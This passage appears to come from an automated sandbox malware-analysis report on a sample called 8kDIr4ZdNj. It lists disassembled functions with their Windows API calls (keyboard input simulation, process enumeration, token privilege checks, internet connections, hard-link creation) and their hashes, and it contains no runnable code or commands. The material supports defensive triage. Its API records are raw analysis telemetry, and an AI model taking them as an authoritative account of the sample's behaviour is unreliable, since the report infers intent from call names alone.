                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008FB915
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 3321077145-0
                                                                        • Opcode ID: da0d26331b47dca23556e1349ffe57ffb9bb9fe6a798df4b7e7ef53d61f82f00
                                                                        • Instruction ID: 283a9daa1ec95df3846f3b7917ccd8734735a8f278f822d5185714d956dec0b2
                                                                        • Opcode Fuzzy Hash: da0d26331b47dca23556e1349ffe57ffb9bb9fe6a798df4b7e7ef53d61f82f00
                                                                        • Instruction Fuzzy Hash: 3141F739600514DFCF11EF29C485A69BBA5FF49310B198098ED8AAB362DB34ED01DB92
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009188DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 7002503c366c2a0e1c531a98fe14c6830d94fefd49443fbad740dd356402f27e
                                                                        • Instruction ID: 07cd5a715f5375e8d1a282ebddff612385c25a572a34ed831aa32a74a5b4f6fe
                                                                        • Opcode Fuzzy Hash: 7002503c366c2a0e1c531a98fe14c6830d94fefd49443fbad740dd356402f27e
                                                                        • Instruction Fuzzy Hash: 1831D43471410CAFEF249A58CC45BFA77A9EB06350F944512FA21E61A1CE34E9C0F752
                                                                        APIs
                                                                        • ClientToScreen.USER32(?,?), ref: 0091AB60
                                                                        • GetWindowRect.USER32(?,?), ref: 0091ABD6
                                                                        • PtInRect.USER32(?,?,?), ref: 0091ABE6
                                                                        • MessageBeep.USER32(00000000), ref: 0091AC57
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        • Opcode ID: 387bef1473cfea0b8d833fca64cf2f3ad4d8b061b871d6c9a950f56eea97c1ea
                                                                        • Instruction ID: 8f753fda1f4d84715c57fdca91ea7ed54c0a9061656232e2dd6e7954016ffd63
                                                                        • Opcode Fuzzy Hash: 387bef1473cfea0b8d833fca64cf2f3ad4d8b061b871d6c9a950f56eea97c1ea
                                                                        • Instruction Fuzzy Hash: 1B418B30B0520DDFCB11CF58C894BA97BF6FB49310F1980A9E998DB261D730AC81DB92
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 008F0B27
                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 008F0B43
                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008F0BA9
                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008F0BFB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 2b22ec05539f195bdb5440456c17287f6bc936ddfe4f362686dfbb4546321055
                                                                        • Instruction ID: c57ad54bd4bbbe1e281d95a6172e70b8bbcc7c7588222739f353e97b1fab1c01
                                                                        • Opcode Fuzzy Hash: 2b22ec05539f195bdb5440456c17287f6bc936ddfe4f362686dfbb4546321055
                                                                        • Instruction Fuzzy Hash: CD310770A4421CAEFB308B798C05BFABBA6FB45338F14825AF691D21D3C77589409B52
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 008F0C66
                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 008F0C82
                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 008F0CE1
                                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 008F0D33
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: b040e363313a0006c3dc5ff61faf3e8b3f79fbdda1e06d8ae7c509664e22d40b
                                                                        • Instruction ID: 1f4e4a3500866b9b4b4c663cc14d7a1091ecdd4d9862fde06fc1a19891ff904f
                                                                        • Opcode Fuzzy Hash: b040e363313a0006c3dc5ff61faf3e8b3f79fbdda1e06d8ae7c509664e22d40b
                                                                        • Instruction Fuzzy Hash: F8314630A0421CAEFF308A798C147FEBBA6FB45324F14835AE694D21D3C3359945DB52
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008C61FB
                                                                        • __isleadbyte_l.LIBCMT ref: 008C6229
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 008C6257
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 008C628D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: b3d67443e33f4b1f3cbb64432b39e614007bd3a660733f176592be87cc257251
                                                                        • Instruction ID: 6640111bd8a62ef4241ac20e60154a93c6a185c6b7b591ee371d42265c75e6e9
                                                                        • Opcode Fuzzy Hash: b3d67443e33f4b1f3cbb64432b39e614007bd3a660733f176592be87cc257251
                                                                        • Instruction Fuzzy Hash: 1F318E3160424AAFDB218F65CC48FAA7BB9FF41321F15413DE864D71A1E731D960DB91
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 008F3C7A
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 008F3C88
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 008F3CA8
                                                                        • CloseHandle.KERNEL32(00000000), ref: 008F3D52
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 420147892-0
                                                                        • Opcode ID: 4dbf9443aa4fdecc582e7932f96f599c4d89ac0916d4f92a1f9d85c1df567d2b
                                                                        • Instruction ID: 957e6be3038cba470def4069a7d03c8d0df611fdccafe87615e47abbf7ce2517
                                                                        • Opcode Fuzzy Hash: 4dbf9443aa4fdecc582e7932f96f599c4d89ac0916d4f92a1f9d85c1df567d2b
                                                                        • Instruction Fuzzy Hash: 50317E311083099BD701FF64D891ABABBE8FF95354F54082DF582C61A1EB719A49CB53
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • GetCursorPos.USER32(?), ref: 0091C4D2
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,?,?,?,?,008CB9AB), ref: 0091C4E7
                                                                        • GetCursorPos.USER32(?), ref: 0091C534
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008CB9AB), ref: 0091C56E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                        • String ID:
                                                                        • API String ID: 2864067406-0
                                                                        • Opcode ID: 7db3be999f8fc28845c43351d912d29f1d0d316c11413b70905a9bd21d18ebd6
                                                                        • Instruction ID: 908356a99b04ddff8a77e025b68a75aac214ec147bd31366f5517db62eca29e3
                                                                        • Opcode Fuzzy Hash: 7db3be999f8fc28845c43351d912d29f1d0d316c11413b70905a9bd21d18ebd6
                                                                        • Instruction Fuzzy Hash: FD31CE7570401CAFCB25CF59D868EFA7BBAEB09310F044069F9058B261C731AD90EBA4
                                                                        APIs
                                                                          • Part of subcall function 008E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008E8121
                                                                          • Part of subcall function 008E810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008E812B
                                                                          • Part of subcall function 008E810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E813A
                                                                          • Part of subcall function 008E810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008E8141
                                                                          • Part of subcall function 008E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E8157
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008E86A3
                                                                        • _memcmp.LIBCMT ref: 008E86C6
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E86FC
                                                                        • HeapFree.KERNEL32(00000000), ref: 008E8703
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                        • String ID:
                                                                        • API String ID: 1592001646-0
                                                                        • Opcode ID: 960bfbf99bf9159f14e19dee4956f2c0c300847ab9a765725db82e61722f3722
                                                                        • Instruction ID: eb35a759f3318a6ca9536184304aa87c00c2a26d6387ae13c65b3f453fd63d62
                                                                        • Opcode Fuzzy Hash: 960bfbf99bf9159f14e19dee4956f2c0c300847ab9a765725db82e61722f3722
                                                                        • Instruction Fuzzy Hash: C6215771E44148EFDB10DFA9C949BEEB7B8FF56308F158059E848AB251DB30AE05DB90
                                                                        APIs
                                                                        • __setmode.LIBCMT ref: 008B09AE
                                                                          • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008F7896,?,?,00000000), ref: 00895A2C
                                                                          • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008F7896,?,?,00000000,?,?), ref: 00895A50
                                                                        • _fprintf.LIBCMT ref: 008B09E5
                                                                        • OutputDebugStringW.KERNEL32(?), ref: 008E5DBB
                                                                          • Part of subcall function 008B4AAA: _flsall.LIBCMT ref: 008B4AC3
                                                                        • __setmode.LIBCMT ref: 008B0A1A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                        • String ID:
                                                                        • API String ID: 521402451-0
                                                                        • Opcode ID: 25cce476e8eb749c5677a9a424b79db5a74658f925829555adf592b601a58c8e
                                                                        • Instruction ID: 1e455d7f9c062e788afe124911076f924eb1d798d0ad13e2c55546d047127d1f
                                                                        • Opcode Fuzzy Hash: 25cce476e8eb749c5677a9a424b79db5a74658f925829555adf592b601a58c8e
                                                                        • Instruction Fuzzy Hash: 7B1127316046186FDB04B2BC9C479FE77A8FF56320F240169F115E6283EE60584297A6
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009017A3
                                                                          • Part of subcall function 0090182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0090184C
                                                                          • Part of subcall function 0090182D: InternetCloseHandle.WININET(00000000), ref: 009018E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 1463438336-0
                                                                        • Opcode ID: 2da708714a1a6dad39cd485c22c9b991a565224b3e3e6e287e15cf7c572997d3
                                                                        • Instruction ID: 933be0a92bdb4204a387fbfd0e96bbc8e898861ec452194cb8bc7b82a0d7439a
                                                                        • Opcode Fuzzy Hash: 2da708714a1a6dad39cd485c22c9b991a565224b3e3e6e287e15cf7c572997d3
                                                                        • Instruction Fuzzy Hash: 9F21A432204605BFEB169F60DC01FBABBADFF88710F14842AF915965D0D7719911A7A0
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,0091FAC0), ref: 008F3A64
                                                                        • GetLastError.KERNEL32 ref: 008F3A73
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 008F3A82
                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0091FAC0), ref: 008F3ADF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 2267087916-0
                                                                        • Opcode ID: ff7946b5a4bb0482e51ffd0e1a48b33ed41d93a2d553c5c49449bafef235e6cf
                                                                        • Instruction ID: 26dfb12f51dc0ed8bd5d934e29705e8d909f16444314d40026729c10807eda78
                                                                        • Opcode Fuzzy Hash: ff7946b5a4bb0482e51ffd0e1a48b33ed41d93a2d553c5c49449bafef235e6cf
                                                                        • Instruction Fuzzy Hash: 3C21B4741086199F8700EF39C8918BA77E8FE55368F144A19F4A9C72A1D731DA45CB42
                                                                        APIs
                                                                          • Part of subcall function 008EF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,008EDCD3,?,?,?,008EEAC6,00000000,000000EF,00000119,?,?), ref: 008EF0CB
                                                                          • Part of subcall function 008EF0BC: lstrcpyW.KERNEL32(00000000,?,?,008EDCD3,?,?,?,008EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008EF0F1
                                                                          • Part of subcall function 008EF0BC: lstrcmpiW.KERNEL32(00000000,?,008EDCD3,?,?,?,008EEAC6,00000000,000000EF,00000119,?,?), ref: 008EF122
                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,008EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008EDCEC
                                                                        • lstrcpyW.KERNEL32(00000000,?,?,008EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008EDD12
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,008EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008EDD46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                        • String ID: cdecl
                                                                        • API String ID: 4031866154-3896280584
                                                                        • Opcode ID: d9ee68277c77f5719367cb39328c7ce5b0fe375e9dc9388d7d2305f5cad1f683
                                                                        • Instruction ID: 0b3f76b35f21aa74f8027a612da9a2f21feba85db45dcfd89a53ae42969d9bf6
                                                                        • Opcode Fuzzy Hash: d9ee68277c77f5719367cb39328c7ce5b0fe375e9dc9388d7d2305f5cad1f683
                                                                        • Instruction Fuzzy Hash: FA11D03A300349EFCB259F75CC45DBA77A8FF46350B40812AF916CB2A0EB719855DB91
                                                                        APIs
                                                                        • _free.LIBCMT ref: 008C5101
                                                                          • Part of subcall function 008B571C: __FF_MSGBANNER.LIBCMT ref: 008B5733
                                                                          • Part of subcall function 008B571C: __NMSG_WRITE.LIBCMT ref: 008B573A
                                                                          • Part of subcall function 008B571C: RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,00000000,?,?,?,008B0DD3,?), ref: 008B575F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: 659e3e00358624906a9ca4f921e65a79ffcd0c9a4ad0a2b744eafb09a012614a
                                                                        • Instruction ID: 8ce2bcdac97a9f8a5bc9d9c0059fa7726922f02f870bd43cecd91743f824b4bf
                                                                        • Opcode Fuzzy Hash: 659e3e00358624906a9ca4f921e65a79ffcd0c9a4ad0a2b744eafb09a012614a
                                                                        • Instruction Fuzzy Hash: D811A372504A19AECF212F78BC49F9E3BA8FB043A1B14452EF908DA351DE30D981D791
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008944CF
                                                                          • Part of subcall function 0089407C: _memset.LIBCMT ref: 008940FC
                                                                          • Part of subcall function 0089407C: _wcscpy.LIBCMT ref: 00894150
                                                                          • Part of subcall function 0089407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00894160
                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00894524
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00894533
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008CD4B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1378193009-0
                                                                        • Opcode ID: 547b8328f92b71986a02bc6f1686a38b31ffb90bfccefc67026edb8a75309ff1
                                                                        • Instruction ID: 6ad156cbc844250ff8f11b2f3f9c565e7d46b35ea5d3b4099ec5584e39c744eb
                                                                        • Opcode Fuzzy Hash: 547b8328f92b71986a02bc6f1686a38b31ffb90bfccefc67026edb8a75309ff1
                                                                        • Instruction Fuzzy Hash: 7E21F5705087889FEB32AB648855FE6BBECFB01308F08409DE79ED6182C3746985DB45
                                                                        APIs
                                                                        • __setmode_nolock.LIBCMT ref: 008C98A8
                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 008C98B4
                                                                        • HeapFree.KERNEL32(00000000), ref: 008C98BB
                                                                        • __lseeki64_nolock.LIBCMT ref: 008C993E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$FreeProcess__lseeki64_nolock__setmode_nolock
                                                                        • String ID:
                                                                        • API String ID: 2225363126-0
                                                                        • Opcode ID: 66ec43ad0cfa251ac60e7fc983bf2fca4d5b0bc051ea8910a770e41b5ab42137
                                                                        • Instruction ID: 94528584d240d4a2050b34d037e7c4e5f783993c0d3cd6a9f04d67ad1f849e36
